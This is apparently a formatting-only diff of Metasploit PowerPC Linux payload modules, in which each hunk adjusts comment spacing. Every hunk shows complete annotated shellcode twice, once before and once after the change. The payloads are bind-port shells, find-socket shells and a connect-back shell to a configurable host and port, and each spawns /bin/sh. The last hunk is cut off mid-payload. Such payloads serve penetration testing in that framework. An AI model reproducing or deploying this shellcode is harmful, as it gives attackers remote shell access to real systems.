"\x38\x1d\xfe\x40" + # addi r0,r29,-448 #
|
||||
"\x44\xff\xff\x02" + # sc #
|
||||
"\x37\x7b\xff\xff" + # addic. r27,r27,-1 #
|
||||
"\x40\x80\xff\xec" + # bge+ <bndsockcode+148> #
|
||||
"\x7c\xa5\x2a\x79" + # xor. r5,r5,r5 #
|
||||
"\x40\x82\xff\xfd" + # bnel+ <bndsockcode+172> #
|
||||
"\x7f\xc8\x02\xa6" + # mflr r30 #
|
||||
"\x3b\xde\x01\xff" + # addi r30,r30,511 #
|
||||
"\x38\x7e\xfe\x25" + # addi r3,r30,-475 #
|
||||
"\x98\xbe\xfe\x2c" + # stb r5,-468(r30) #
|
||||
"\x94\xa1\xff\xfc" + # stwu r5,-4(r1) #
|
||||
"\x94\x61\xff\xfc" + # stwu r3,-4(r1) #
|
||||
"\x7c\x24\x0b\x78" + # mr r4,r1 #
|
||||
"\x38\x1d\xfe\x0c" + # addi r0,r29,-500 #
|
||||
"\x44\xff\xff\x02" + # sc #
|
||||
"/bin/sh"
|
||||
}
|
||||
))
|
||||
|
|
|
@ -32,47 +32,47 @@ module MetasploitModule
|
|||
'CPORT' => [ 86, 'n' ],
|
||||
},
|
||||
'Payload' =>
|
||||
"\x7f\xff\xfa\x78" +# xor r31,r31,r31 #
|
||||
"\x3b\xa0\x01\xff" +# li r29,511 #
|
||||
"\x97\xe1\xff\xfc" +# stwu r31,-4(r1) #
|
||||
"\x7c\x3c\x0b\x78" +# mr r28,r1 #
|
||||
"\x3b\x7d\xfe\x11" +# addi r27,r29,-495 #
|
||||
"\x97\x61\xff\xfc" +# stwu r27,-4(r1) #
|
||||
"\x7c\x3a\x0b\x78" +# mr r26,r1 #
|
||||
"\x97\x41\xff\xfc" +# stwu r26,-4(r1) #
|
||||
"\x97\x81\xff\xfc" +# stwu r28,-4(r1) #
|
||||
"\x97\xe1\xff\xfc" +# stwu r31,-4(r1) #
|
||||
"\x3b\xff\x01\xff" +# addi r31,r31,511 #
|
||||
"\x3b\xff\xfe\x02" +# addi r31,r31,-510 #
|
||||
"\x38\x21\x01\xff" +# addi r1,r1,511 #
|
||||
"\x38\x21\xfe\x05" +# addi r1,r1,-507 #
|
||||
"\x97\xe1\xff\xfc" +# stwu r31,-4(r1) #
|
||||
"\x7c\x24\x0b\x78" +# mr r4,r1 #
|
||||
"\x38\x7d\xfe\x08" +# addi r3,r29,-504 #
|
||||
"\x38\x1d\xfe\x67" +# addi r0,r29,-409 #
|
||||
"\x44\xff\xff\x02" +# sc #
|
||||
"\x3b\x3c\x01\xff" +# addi r25,r28,511 #
|
||||
"\xa3\x39\xfe\x03" +# lhz r25,-509(r25) #
|
||||
"\x28\x19\x04\xd2" +# cmplwi r25,1234 #
|
||||
"\x40\x82\xff\xd0" +# bne+ <fndsockcode+40> #
|
||||
"\x3b\x1d\xfe\x03" +# addi r24,r29,-509 #
|
||||
"\x7f\x04\xc3\x78" +# mr r4,r24 #
|
||||
"\x7f\xe3\xfb\x78" +# mr r3,r31 #
|
||||
"\x38\x1d\xfe\x40" +# addi r0,r29,-448 #
|
||||
"\x44\xff\xff\x02" +# sc #
|
||||
"\x37\x18\xff\xff" +# addic. r24,r24,-1 #
|
||||
"\x40\x80\xff\xec" +# bge+ <fndsockcode+96> #
|
||||
"\x7c\xa5\x2a\x79" +# xor. r5,r5,r5 #
|
||||
"\x40\x82\xff\xfd" +# bnel+ <fndsockcode+120> #
|
||||
"\x7f\xc8\x02\xa6" +# mflr r30 #
|
||||
"\x3b\xde\x01\xff" +# addi r30,r30,511 #
|
||||
"\x38\x7e\xfe\x25" +# addi r3,r30,-475 #
|
||||
"\x98\xbe\xfe\x2c" +# stb r5,-468(r30) #
|
||||
"\x94\xa1\xff\xfc" +# stwu r5,-4(r1) #
|
||||
"\x94\x61\xff\xfc" +# stwu r3,-4(r1) #
|
||||
"\x7c\x24\x0b\x78" +# mr r4,r1 #
|
||||
"\x38\x1d\xfe\x0c" +# addi r0,r29,-500 #
|
||||
"\x44\xff\xff\x02" +# sc #
|
||||
"\x7f\xff\xfa\x78" + # xor r31,r31,r31 #
|
||||
"\x3b\xa0\x01\xff" + # li r29,511 #
|
||||
"\x97\xe1\xff\xfc" + # stwu r31,-4(r1) #
|
||||
"\x7c\x3c\x0b\x78" + # mr r28,r1 #
|
||||
"\x3b\x7d\xfe\x11" + # addi r27,r29,-495 #
|
||||
"\x97\x61\xff\xfc" + # stwu r27,-4(r1) #
|
||||
"\x7c\x3a\x0b\x78" + # mr r26,r1 #
|
||||
"\x97\x41\xff\xfc" + # stwu r26,-4(r1) #
|
||||
"\x97\x81\xff\xfc" + # stwu r28,-4(r1) #
|
||||
"\x97\xe1\xff\xfc" + # stwu r31,-4(r1) #
|
||||
"\x3b\xff\x01\xff" + # addi r31,r31,511 #
|
||||
"\x3b\xff\xfe\x02" + # addi r31,r31,-510 #
|
||||
"\x38\x21\x01\xff" + # addi r1,r1,511 #
|
||||
"\x38\x21\xfe\x05" + # addi r1,r1,-507 #
|
||||
"\x97\xe1\xff\xfc" + # stwu r31,-4(r1) #
|
||||
"\x7c\x24\x0b\x78" + # mr r4,r1 #
|
||||
"\x38\x7d\xfe\x08" + # addi r3,r29,-504 #
|
||||
"\x38\x1d\xfe\x67" + # addi r0,r29,-409 #
|
||||
"\x44\xff\xff\x02" + # sc #
|
||||
"\x3b\x3c\x01\xff" + # addi r25,r28,511 #
|
||||
"\xa3\x39\xfe\x03" + # lhz r25,-509(r25) #
|
||||
"\x28\x19\x04\xd2" + # cmplwi r25,1234 #
|
||||
"\x40\x82\xff\xd0" + # bne+ <fndsockcode+40> #
|
||||
"\x3b\x1d\xfe\x03" + # addi r24,r29,-509 #
|
||||
"\x7f\x04\xc3\x78" + # mr r4,r24 #
|
||||
"\x7f\xe3\xfb\x78" + # mr r3,r31 #
|
||||
"\x38\x1d\xfe\x40" + # addi r0,r29,-448 #
|
||||
"\x44\xff\xff\x02" + # sc #
|
||||
"\x37\x18\xff\xff" + # addic. r24,r24,-1 #
|
||||
"\x40\x80\xff\xec" + # bge+ <fndsockcode+96> #
|
||||
"\x7c\xa5\x2a\x79" + # xor. r5,r5,r5 #
|
||||
"\x40\x82\xff\xfd" + # bnel+ <fndsockcode+120> #
|
||||
"\x7f\xc8\x02\xa6" + # mflr r30 #
|
||||
"\x3b\xde\x01\xff" + # addi r30,r30,511 #
|
||||
"\x38\x7e\xfe\x25" + # addi r3,r30,-475 #
|
||||
"\x98\xbe\xfe\x2c" + # stb r5,-468(r30) #
|
||||
"\x94\xa1\xff\xfc" + # stwu r5,-4(r1) #
|
||||
"\x94\x61\xff\xfc" + # stwu r3,-4(r1) #
|
||||
"\x7c\x24\x0b\x78" + # mr r4,r1 #
|
||||
"\x38\x1d\xfe\x0c" + # addi r0,r29,-500 #
|
||||
"\x44\xff\xff\x02" + # sc #
|
||||
"/bin/sh"
|
||||
}
|
||||
))
|
||||
|
|
|
@ -33,50 +33,50 @@ module MetasploitModule
|
|||
'LPORT' => [ 62, 'n' ],
|
||||
},
|
||||
'Payload' =>
|
||||
"\x7f\xff\xfa\x78" +# xor r31,r31,r31 #
|
||||
"\x3b\xa0\x01\xff" +# li r29,511 #
|
||||
"\x3b\x9d\xfe\x02" +# addi r28,r29,-510 #
|
||||
"\x3b\x7d\xfe\x03" +# addi r27,r29,-509 #
|
||||
"\x97\xe1\xff\xfc" +# stwu r31,-4(r1) #
|
||||
"\x97\x81\xff\xfc" +# stwu r28,-4(r1) #
|
||||
"\x97\x61\xff\xfc" +# stwu r27,-4(r1) #
|
||||
"\x7c\x24\x0b\x78" +# mr r4,r1 #
|
||||
"\x38\x7d\xfe\x02" +# addi r3,r29,-510 #
|
||||
"\x38\x1d\xfe\x67" +# addi r0,r29,-409 #
|
||||
"\x44\xff\xff\x02" +# sc #
|
||||
"\x7c\x7a\x1b\x78" +# mr r26,r3 #
|
||||
"\x3b\x3d\xfe\x11" +# addi r25,r29,-495 #
|
||||
"\x3e\xe0\x7f\x00" +# lis r23,32512 #
|
||||
"\x62\xf7\x00\x01" +# ori r23,r23,1 #
|
||||
"\x3a\xc0\x04\xd2" +# li r22,1234 #
|
||||
"\x96\xe1\xff\xfc" +# stwu r23,-4(r1) #
|
||||
"\x96\xc1\xff\xfc" +# stwu r22,-4(r1) #
|
||||
"\x93\x61\xff\xfe" +# stw r27,-2(r1) #
|
||||
"\x7c\x35\x0b\x78" +# mr r21,r1 #
|
||||
"\x97\x21\xff\xfc" +# stwu r25,-4(r1) #
|
||||
"\x96\xa1\xff\xfc" +# stwu r21,-4(r1) #
|
||||
"\x97\x41\xff\xfc" +# stwu r26,-4(r1) #
|
||||
"\x7c\x24\x0b\x78" +# mr r4,r1 #
|
||||
"\x38\x7d\xfe\x04" +# addi r3,r29,-508 #
|
||||
"\x38\x1d\xfe\x67" +# addi r0,r29,-409 #
|
||||
"\x44\xff\xff\x02" +# sc #
|
||||
"\x7f\x64\xdb\x78" +# mr r4,r27 #
|
||||
"\x7f\x43\xd3\x78" +# mr r3,r26 #
|
||||
"\x38\x1d\xfe\x40" +# addi r0,r29,-448 #
|
||||
"\x44\xff\xff\x02" +# sc #
|
||||
"\x37\x7b\xff\xff" +# addic. r27,r27,-1 #
|
||||
"\x40\x80\xff\xec" +# bge+ <cntsockcode+108> #
|
||||
"\x7c\xa5\x2a\x79" +# xor. r5,r5,r5 #
|
||||
"\x40\x82\xff\xfd" +# bnel+ <cntsockcode+132> #
|
||||
"\x7f\xc8\x02\xa6" +# mflr r30 #
|
||||
"\x3b\xde\x01\xff" +# addi r30,r30,511 #
|
||||
"\x38\x7e\xfe\x25" +# addi r3,r30,-475 #
|
||||
"\x98\xbe\xfe\x2c" +# stb r5,-468(r30) #
|
||||
"\x94\xa1\xff\xfc" +# stwu r5,-4(r1) #
|
||||
"\x94\x61\xff\xfc" +# stwu r3,-4(r1) #
|
||||
"\x7c\x24\x0b\x78" +# mr r4,r1 #
|
||||
"\x38\x1d\xfe\x0c" +# addi r0,r29,-500 #
|
||||
"\x44\xff\xff\x02" +# sc #
|
||||
"\x7f\xff\xfa\x78" + # xor r31,r31,r31 #
|
||||
"\x3b\xa0\x01\xff" + # li r29,511 #
|
||||
"\x3b\x9d\xfe\x02" + # addi r28,r29,-510 #
|
||||
"\x3b\x7d\xfe\x03" + # addi r27,r29,-509 #
|
||||
"\x97\xe1\xff\xfc" + # stwu r31,-4(r1) #
|
||||
"\x97\x81\xff\xfc" + # stwu r28,-4(r1) #
|
||||
"\x97\x61\xff\xfc" + # stwu r27,-4(r1) #
|
||||
"\x7c\x24\x0b\x78" + # mr r4,r1 #
|
||||
"\x38\x7d\xfe\x02" + # addi r3,r29,-510 #
|
||||
"\x38\x1d\xfe\x67" + # addi r0,r29,-409 #
|
||||
"\x44\xff\xff\x02" + # sc #
|
||||
"\x7c\x7a\x1b\x78" + # mr r26,r3 #
|
||||
"\x3b\x3d\xfe\x11" + # addi r25,r29,-495 #
|
||||
"\x3e\xe0\x7f\x00" + # lis r23,32512 #
|
||||
"\x62\xf7\x00\x01" + # ori r23,r23,1 #
|
||||
"\x3a\xc0\x04\xd2" + # li r22,1234 #
|
||||
"\x96\xe1\xff\xfc" + # stwu r23,-4(r1) #
|
||||
"\x96\xc1\xff\xfc" + # stwu r22,-4(r1) #
|
||||
"\x93\x61\xff\xfe" + # stw r27,-2(r1) #
|
||||
"\x7c\x35\x0b\x78" + # mr r21,r1 #
|
||||
"\x97\x21\xff\xfc" + # stwu r25,-4(r1) #
|
||||
"\x96\xa1\xff\xfc" + # stwu r21,-4(r1) #
|
||||
"\x97\x41\xff\xfc" + # stwu r26,-4(r1) #
|
||||
"\x7c\x24\x0b\x78" + # mr r4,r1 #
|
||||
"\x38\x7d\xfe\x04" + # addi r3,r29,-508 #
|
||||
"\x38\x1d\xfe\x67" + # addi r0,r29,-409 #
|
||||
"\x44\xff\xff\x02" + # sc #
|
||||
"\x7f\x64\xdb\x78" + # mr r4,r27 #
|
||||
"\x7f\x43\xd3\x78" + # mr r3,r26 #
|
||||
"\x38\x1d\xfe\x40" + # addi r0,r29,-448 #
|
||||
"\x44\xff\xff\x02" + # sc #
|
||||
"\x37\x7b\xff\xff" + # addic. r27,r27,-1 #
|
||||
"\x40\x80\xff\xec" + # bge+ <cntsockcode+108> #
|
||||
"\x7c\xa5\x2a\x79" + # xor. r5,r5,r5 #
|
||||
"\x40\x82\xff\xfd" + # bnel+ <cntsockcode+132> #
|
||||
"\x7f\xc8\x02\xa6" + # mflr r30 #
|
||||
"\x3b\xde\x01\xff" + # addi r30,r30,511 #
|
||||
"\x38\x7e\xfe\x25" + # addi r3,r30,-475 #
|
||||
"\x98\xbe\xfe\x2c" + # stb r5,-468(r30) #
|
||||
"\x94\xa1\xff\xfc" + # stwu r5,-4(r1) #
|
||||
"\x94\x61\xff\xfc" + # stwu r3,-4(r1) #
|
||||
"\x7c\x24\x0b\x78" + # mr r4,r1 #
|
||||
"\x38\x1d\xfe\x0c" + # addi r0,r29,-500 #
|
||||
"\x44\xff\xff\x02" + # sc #
|
||||
"/bin/sh"
|
||||
}
|
||||
))
|
||||
|
|
|
@ -32,60 +32,60 @@ module MetasploitModule
|
|||
'LPORT' => [ 58, 'n' ],
|
||||
},
|
||||
'Payload' =>
|
||||
"\x7f\xff\xfa\x78" +# xor r31,r31,r31 #
|
||||
"\x3b\xa0\x01\xff" +# li r29,511 #
|
||||
"\x3b\x9d\xfe\x02" +# addi r28,r29,-510 #
|
||||
"\x3b\x7d\xfe\x03" +# addi r27,r29,-509 #
|
||||
"\xfb\xe1\xff\xf9" +# stdu r31,-8(r1) #
|
||||
"\xfb\x81\xff\xf9" +# stdu r28,-8(r1) #
|
||||
"\xfb\x61\xff\xf9" +# stdu r27,-8(r1) #
|
||||
"\x7c\x24\x0b\x78" +# mr r4,r1 #
|
||||
"\x38\x7d\xfe\x02" +# addi r3,r29,-510 #
|
||||
"\x38\x1d\xfe\x67" +# addi r0,r29,-409 #
|
||||
"\x44\xff\xff\x02" +# sc #
|
||||
"\x7c\x7a\x1b\x78" +# mr r26,r3 #
|
||||
"\x3b\x3d\xfe\x11" +# addi r25,r29,-495 #
|
||||
"\x3e\xe0\xff\x02" +# lis r23,-254 #
|
||||
"\x62\xf7\x04\xd2" +# ori r23,r23,1234 #
|
||||
"\x97\xe1\xff\xfc" +# stwu r31,-4(r1) #
|
||||
"\x96\xe1\xff\xfc" +# stwu r23,-4(r1) #
|
||||
"\x7c\x36\x0b\x78" +# mr r22,r1 #
|
||||
"\xfb\x21\xff\xf9" +# stdu r25,-8(r1) #
|
||||
"\xfa\xc1\xff\xf9" +# stdu r22,-8(r1) #
|
||||
"\xfb\x41\xff\xf9" +# stdu r26,-8(r1) #
|
||||
"\x7c\x24\x0b\x78" +# mr r4,r1 #
|
||||
"\x38\x7d\xfe\x03" +# addi r3,r29,-509 #
|
||||
"\x38\x1d\xfe\x67" +# addi r0,r29,-409 #
|
||||
"\x44\xff\xff\x02" +# sc #
|
||||
"\xfb\xe1\xff\xf9" +# stdu r31,-8(r1) #
|
||||
"\xfb\xe1\xff\xf9" +# stdu r31,-8(r1) #
|
||||
"\xfb\x41\xff\xf9" +# stdu r26,-8(r1) #
|
||||
"\x7c\x24\x0b\x78" +# mr r4,r1 #
|
||||
"\x38\x7d\xfe\x05" +# addi r3,r29,-507 #
|
||||
"\x38\x1d\xfe\x67" +# addi r0,r29,-409 #
|
||||
"\x44\xff\xff\x02" +# sc #
|
||||
"\x7c\x24\x0b\x78" +# mr r4,r1 #
|
||||
"\x38\x7d\xfe\x06" +# addi r3,r29,-506 #
|
||||
"\x38\x1d\xfe\x67" +# addi r0,r29,-409 #
|
||||
"\x44\xff\xff\x02" +# sc #
|
||||
"\x7c\x75\x1b\x78" +# mr r21,r3 #
|
||||
"\x7f\x64\xdb\x78" +# mr r4,r27 #
|
||||
"\x7e\xa3\xab\x78" +# mr r3,r21 #
|
||||
"\x38\x1d\xfe\x40" +# addi r0,r29,-448 #
|
||||
"\x44\xff\xff\x02" +# sc #
|
||||
"\x37\x7b\xff\xff" +# addic. r27,r27,-1 #
|
||||
"\x40\x80\xff\xec" +# bge+ <bndsockcode64+148> #
|
||||
"\x7c\xa5\x2a\x79" +# xor. r5,r5,r5 #
|
||||
"\x40\x82\xff\xfd" +# bnel+ <bndsockcode64+172> #
|
||||
"\x7f\xc8\x02\xa6" +# mflr r30 #
|
||||
"\x3b\xde\x01\xff" +# addi r30,r30,511 #
|
||||
"\x38\x7e\xfe\x25" +# addi r3,r30,-475 #
|
||||
"\x98\xbe\xfe\x2c" +# stb r5,-468(r30) #
|
||||
"\xf8\xa1\xff\xf9" +# stdu r5,-8(r1) #
|
||||
"\xf8\x61\xff\xf9" +# stdu r3,-8(r1) #
|
||||
"\x7c\x24\x0b\x78" +# mr r4,r1 #
|
||||
"\x38\x1d\xfe\x0c" +# addi r0,r29,-500 #
|
||||
"\x44\xff\xff\x02" +# sc #
|
||||
"\x7f\xff\xfa\x78" + # xor r31,r31,r31 #
|
||||
"\x3b\xa0\x01\xff" + # li r29,511 #
|
||||
"\x3b\x9d\xfe\x02" + # addi r28,r29,-510 #
|
||||
"\x3b\x7d\xfe\x03" + # addi r27,r29,-509 #
|
||||
"\xfb\xe1\xff\xf9" + # stdu r31,-8(r1) #
|
||||
"\xfb\x81\xff\xf9" + # stdu r28,-8(r1) #
|
||||
"\xfb\x61\xff\xf9" + # stdu r27,-8(r1) #
|
||||
"\x7c\x24\x0b\x78" + # mr r4,r1 #
|
||||
"\x38\x7d\xfe\x02" + # addi r3,r29,-510 #
|
||||
"\x38\x1d\xfe\x67" + # addi r0,r29,-409 #
|
||||
"\x44\xff\xff\x02" + # sc #
|
||||
"\x7c\x7a\x1b\x78" + # mr r26,r3 #
|
||||
"\x3b\x3d\xfe\x11" + # addi r25,r29,-495 #
|
||||
"\x3e\xe0\xff\x02" + # lis r23,-254 #
|
||||
"\x62\xf7\x04\xd2" + # ori r23,r23,1234 #
|
||||
"\x97\xe1\xff\xfc" + # stwu r31,-4(r1) #
|
||||
"\x96\xe1\xff\xfc" + # stwu r23,-4(r1) #
|
||||
"\x7c\x36\x0b\x78" + # mr r22,r1 #
|
||||
"\xfb\x21\xff\xf9" + # stdu r25,-8(r1) #
|
||||
"\xfa\xc1\xff\xf9" + # stdu r22,-8(r1) #
|
||||
"\xfb\x41\xff\xf9" + # stdu r26,-8(r1) #
|
||||
"\x7c\x24\x0b\x78" + # mr r4,r1 #
|
||||
"\x38\x7d\xfe\x03" + # addi r3,r29,-509 #
|
||||
"\x38\x1d\xfe\x67" + # addi r0,r29,-409 #
|
||||
"\x44\xff\xff\x02" + # sc #
|
||||
"\xfb\xe1\xff\xf9" + # stdu r31,-8(r1) #
|
||||
"\xfb\xe1\xff\xf9" + # stdu r31,-8(r1) #
|
||||
"\xfb\x41\xff\xf9" + # stdu r26,-8(r1) #
|
||||
"\x7c\x24\x0b\x78" + # mr r4,r1 #
|
||||
"\x38\x7d\xfe\x05" + # addi r3,r29,-507 #
|
||||
"\x38\x1d\xfe\x67" + # addi r0,r29,-409 #
|
||||
"\x44\xff\xff\x02" + # sc #
|
||||
"\x7c\x24\x0b\x78" + # mr r4,r1 #
|
||||
"\x38\x7d\xfe\x06" + # addi r3,r29,-506 #
|
||||
"\x38\x1d\xfe\x67" + # addi r0,r29,-409 #
|
||||
"\x44\xff\xff\x02" + # sc #
|
||||
"\x7c\x75\x1b\x78" + # mr r21,r3 #
|
||||
"\x7f\x64\xdb\x78" + # mr r4,r27 #
|
||||
"\x7e\xa3\xab\x78" + # mr r3,r21 #
|
||||
"\x38\x1d\xfe\x40" + # addi r0,r29,-448 #
|
||||
"\x44\xff\xff\x02" + # sc #
|
||||
"\x37\x7b\xff\xff" + # addic. r27,r27,-1 #
|
||||
"\x40\x80\xff\xec" + # bge+ <bndsockcode64+148> #
|
||||
"\x7c\xa5\x2a\x79" + # xor. r5,r5,r5 #
|
||||
"\x40\x82\xff\xfd" + # bnel+ <bndsockcode64+172> #
|
||||
"\x7f\xc8\x02\xa6" + # mflr r30 #
|
||||
"\x3b\xde\x01\xff" + # addi r30,r30,511 #
|
||||
"\x38\x7e\xfe\x25" + # addi r3,r30,-475 #
|
||||
"\x98\xbe\xfe\x2c" + # stb r5,-468(r30) #
|
||||
"\xf8\xa1\xff\xf9" + # stdu r5,-8(r1) #
|
||||
"\xf8\x61\xff\xf9" + # stdu r3,-8(r1) #
|
||||
"\x7c\x24\x0b\x78" + # mr r4,r1 #
|
||||
"\x38\x1d\xfe\x0c" + # addi r0,r29,-500 #
|
||||
"\x44\xff\xff\x02" + # sc #
|
||||
"/bin/sh"
|
||||
}
|
||||
))
|
||||
|
|
|
@ -32,47 +32,47 @@ module MetasploitModule
|
|||
'CPORT' => [ 86, 'n' ],
|
||||
},
|
||||
'Payload' =>
|
||||
"\x7f\xff\xfa\x78" +# xor r31,r31,r31 #
|
||||
"\x3b\xa0\x01\xff" +# li r29,511 #
|
||||
"\x97\xe1\xff\xfc" +# stwu r31,-4(r1) #
|
||||
"\x7c\x3c\x0b\x78" +# mr r28,r1 #
|
||||
"\x3b\x7d\xfe\x11" +# addi r27,r29,-495 #
|
||||
"\x97\x61\xff\xfc" +# stwu r27,-4(r1) #
|
||||
"\x7c\x3a\x0b\x78" +# mr r26,r1 #
|
||||
"\xfb\x41\xff\xf9" +# stdu r26,-8(r1) #
|
||||
"\xfb\x81\xff\xf9" +# stdu r28,-8(r1) #
|
||||
"\xfb\xe1\xff\xf9" +# stdu r31,-8(r1) #
|
||||
"\x3b\xff\x01\xff" +# addi r31,r31,511 #
|
||||
"\x3b\xff\xfe\x02" +# addi r31,r31,-510 #
|
||||
"\x38\x21\x01\xff" +# addi r1,r1,511 #
|
||||
"\x38\x21\xfe\x09" +# addi r1,r1,-503 #
|
||||
"\xfb\xe1\xff\xf9" +# stdu r31,-8(r1) #
|
||||
"\x7c\x24\x0b\x78" +# mr r4,r1 #
|
||||
"\x38\x7d\xfe\x08" +# addi r3,r29,-504 #
|
||||
"\x38\x1d\xfe\x67" +# addi r0,r29,-409 #
|
||||
"\x44\xff\xff\x02" +# sc #
|
||||
"\x3b\x3c\x01\xff" +# addi r25,r28,511 #
|
||||
"\xa3\x39\xfe\x03" +# lhz r25,-509(r25) #
|
||||
"\x28\x19\x04\xd2" +# cmplwi r25,1234 #
|
||||
"\x40\x82\xff\xd0" +# bne+ <fndsockcode64+40> #
|
||||
"\x3b\x1d\xfe\x03" +# addi r24,r29,-509 #
|
||||
"\x7f\x04\xc3\x78" +# mr r4,r24 #
|
||||
"\x7f\xe3\xfb\x78" +# mr r3,r31 #
|
||||
"\x38\x1d\xfe\x40" +# addi r0,r29,-448 #
|
||||
"\x44\xff\xff\x02" +# sc #
|
||||
"\x37\x18\xff\xff" +# addic. r24,r24,-1 #
|
||||
"\x40\x80\xff\xec" +# bge+ <fndsockcode64+96> #
|
||||
"\x7c\xa5\x2a\x79" +# xor. r5,r5,r5 #
|
||||
"\x40\x82\xff\xfd" +# bnel+ <fndsockcode64+120> #
|
||||
"\x7f\xc8\x02\xa6" +# mflr r30 #
|
||||
"\x3b\xde\x01\xff" +# addi r30,r30,511 #
|
||||
"\x38\x7e\xfe\x25" +# addi r3,r30,-475 #
|
||||
"\x98\xbe\xfe\x2c" +# stb r5,-468(r30) #
|
||||
"\xf8\xa1\xff\xf9" +# stdu r5,-8(r1) #
|
||||
"\xf8\x61\xff\xf9" +# stdu r3,-8(r1) #
|
||||
"\x7c\x24\x0b\x78" +# mr r4,r1 #
|
||||
"\x38\x1d\xfe\x0c" +# addi r0,r29,-500 #
|
||||
"\x44\xff\xff\x02" +# sc #
|
||||
"\x7f\xff\xfa\x78" + # xor r31,r31,r31 #
|
||||
"\x3b\xa0\x01\xff" + # li r29,511 #
|
||||
"\x97\xe1\xff\xfc" + # stwu r31,-4(r1) #
|
||||
"\x7c\x3c\x0b\x78" + # mr r28,r1 #
|
||||
"\x3b\x7d\xfe\x11" + # addi r27,r29,-495 #
|
||||
"\x97\x61\xff\xfc" + # stwu r27,-4(r1) #
|
||||
"\x7c\x3a\x0b\x78" + # mr r26,r1 #
|
||||
"\xfb\x41\xff\xf9" + # stdu r26,-8(r1) #
|
||||
"\xfb\x81\xff\xf9" + # stdu r28,-8(r1) #
|
||||
"\xfb\xe1\xff\xf9" + # stdu r31,-8(r1) #
|
||||
"\x3b\xff\x01\xff" + # addi r31,r31,511 #
|
||||
"\x3b\xff\xfe\x02" + # addi r31,r31,-510 #
|
||||
"\x38\x21\x01\xff" + # addi r1,r1,511 #
|
||||
"\x38\x21\xfe\x09" + # addi r1,r1,-503 #
|
||||
"\xfb\xe1\xff\xf9" + # stdu r31,-8(r1) #
|
||||
"\x7c\x24\x0b\x78" + # mr r4,r1 #
|
||||
"\x38\x7d\xfe\x08" + # addi r3,r29,-504 #
|
||||
"\x38\x1d\xfe\x67" + # addi r0,r29,-409 #
|
||||
"\x44\xff\xff\x02" + # sc #
|
||||
"\x3b\x3c\x01\xff" + # addi r25,r28,511 #
|
||||
"\xa3\x39\xfe\x03" + # lhz r25,-509(r25) #
|
||||
"\x28\x19\x04\xd2" + # cmplwi r25,1234 #
|
||||
"\x40\x82\xff\xd0" + # bne+ <fndsockcode64+40> #
|
||||
"\x3b\x1d\xfe\x03" + # addi r24,r29,-509 #
|
||||
"\x7f\x04\xc3\x78" + # mr r4,r24 #
|
||||
"\x7f\xe3\xfb\x78" + # mr r3,r31 #
|
||||
"\x38\x1d\xfe\x40" + # addi r0,r29,-448 #
|
||||
"\x44\xff\xff\x02" + # sc #
|
||||
"\x37\x18\xff\xff" + # addic. r24,r24,-1 #
|
||||
"\x40\x80\xff\xec" + # bge+ <fndsockcode64+96> #
|
||||
"\x7c\xa5\x2a\x79" + # xor. r5,r5,r5 #
|
||||
"\x40\x82\xff\xfd" + # bnel+ <fndsockcode64+120> #
|
||||
"\x7f\xc8\x02\xa6" + # mflr r30 #
|
||||
"\x3b\xde\x01\xff" + # addi r30,r30,511 #
|
||||
"\x38\x7e\xfe\x25" + # addi r3,r30,-475 #
|
||||
"\x98\xbe\xfe\x2c" + # stb r5,-468(r30) #
|
||||
"\xf8\xa1\xff\xf9" + # stdu r5,-8(r1) #
|
||||
"\xf8\x61\xff\xf9" + # stdu r3,-8(r1) #
|
||||
"\x7c\x24\x0b\x78" + # mr r4,r1 #
|
||||
"\x38\x1d\xfe\x0c" + # addi r0,r29,-500 #
|
||||
"\x44\xff\xff\x02" + # sc #
|
||||
"/bin/sh"
|
||||
}
|
||||
))
|
||||
|
|
|
@ -33,50 +33,50 @@ module MetasploitModule
|
|||
'LPORT' => [ 62, 'n' ],
|
||||
},
|
||||
'Payload' =>
|
||||
"\x7f\xff\xfa\x78" +# xor r31,r31,r31 #
|
||||
"\x3b\xa0\x01\xff" +# li r29,511 #
|
||||
"\x3b\x9d\xfe\x02" +# addi r28,r29,-510 #
|
||||
"\x3b\x7d\xfe\x03" +# addi r27,r29,-509 #
|
||||
"\xfb\xe1\xff\xf9" +# stdu r31,-8(r1) #
|
||||
"\xfb\x81\xff\xf9" +# stdu r28,-8(r1) #
|
||||
"\xfb\x61\xff\xf9" +# stdu r27,-8(r1) #
|
||||
"\x7c\x24\x0b\x78" +# mr r4,r1 #
|
||||
"\x38\x7d\xfe\x02" +# addi r3,r29,-510 #
|
||||
"\x38\x1d\xfe\x67" +# addi r0,r29,-409 #
|
||||
"\x44\xff\xff\x02" +# sc #
|
||||
"\x7c\x7a\x1b\x78" +# mr r26,r3 #
|
||||
"\x3b\x3d\xfe\x11" +# addi r25,r29,-495 #
|
||||
"\x3e\xe0\x7f\x00" +# lis r23,32512 #
|
||||
"\x62\xf7\x00\x01" +# ori r23,r23,1 #
|
||||
"\x3a\xc0\x04\xd2" +# li r22,1234 #
|
||||
"\x96\xe1\xff\xfc" +# stwu r23,-4(r1) #
|
||||
"\x96\xc1\xff\xfc" +# stwu r22,-4(r1) #
|
||||
"\x93\x61\xff\xfe" +# stw r27,-2(r1) #
|
||||
"\x7c\x35\x0b\x78" +# mr r21,r1 #
|
||||
"\xfb\x21\xff\xf9" +# stdu r25,-8(r1) #
|
||||
"\xfa\xa1\xff\xf9" +# stdu r21,-8(r1) #
|
||||
"\xfb\x41\xff\xf9" +# stdu r26,-8(r1) #
|
||||
"\x7c\x24\x0b\x78" +# mr r4,r1 #
|
||||
"\x38\x7d\xfe\x04" +# addi r3,r29,-508 #
|
||||
"\x38\x1d\xfe\x67" +# addi r0,r29,-409 #
|
||||
"\x44\xff\xff\x02" +# sc #
|
||||
"\x7f\x64\xdb\x78" +# mr r4,r27 #
|
||||
"\x7f\x43\xd3\x78" +# mr r3,r26 #
|
||||
"\x38\x1d\xfe\x40" +# addi r0,r29,-448 #
|
||||
"\x44\xff\xff\x02" +# sc #
|
||||
"\x37\x7b\xff\xff" +# addic. r27,r27,-1 #
|
||||
"\x40\x80\xff\xec" +# bge+ <cntsockcode64+108> #
|
||||
"\x7c\xa5\x2a\x79" +# xor. r5,r5,r5 #
|
||||
"\x40\x82\xff\xfd" +# bnel+ <cntsockcode64+132> #
|
||||
"\x7f\xc8\x02\xa6" +# mflr r30 #
|
||||
"\x3b\xde\x01\xff" +# addi r30,r30,511 #
|
||||
"\x38\x7e\xfe\x25" +# addi r3,r30,-475 #
|
||||
"\x98\xbe\xfe\x2c" +# stb r5,-468(r30) #
|
||||
"\xf8\xa1\xff\xf9" +# stdu r5,-8(r1) #
|
||||
"\xf8\x61\xff\xf9" +# stdu r3,-8(r1) #
|
||||
"\x7c\x24\x0b\x78" +# mr r4,r1 #
|
